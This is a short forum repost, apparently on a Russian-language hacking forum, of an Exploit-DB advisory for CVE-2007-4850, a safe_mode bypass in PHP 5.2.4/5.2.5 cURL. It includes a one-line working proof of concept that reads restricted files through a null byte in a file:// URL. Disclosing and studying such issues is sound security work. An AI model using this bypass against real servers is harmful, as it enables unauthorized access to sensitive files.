Exploit PHP 5.2.5 - cURL 'safe_mode' Security Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31053
Проверка EDB
  1. Пройдено
Автор
MAKSYMILIAN ARCIEMOWICZ
Тип уязвимости
REMOTE
Платформа
PHP
CVE
cve-2007-4850
Дата публикации
2008-01-23
PHP:
source: https://www.securityfocus.com/bid/27413/info

PHP cURL is prone to a 'safe mode' security-bypass vulnerability.

Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.

The issue affects PHP 5.2.5 and 5.2.4. 

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
 
Источник
www.exploit-db.com

Похожие темы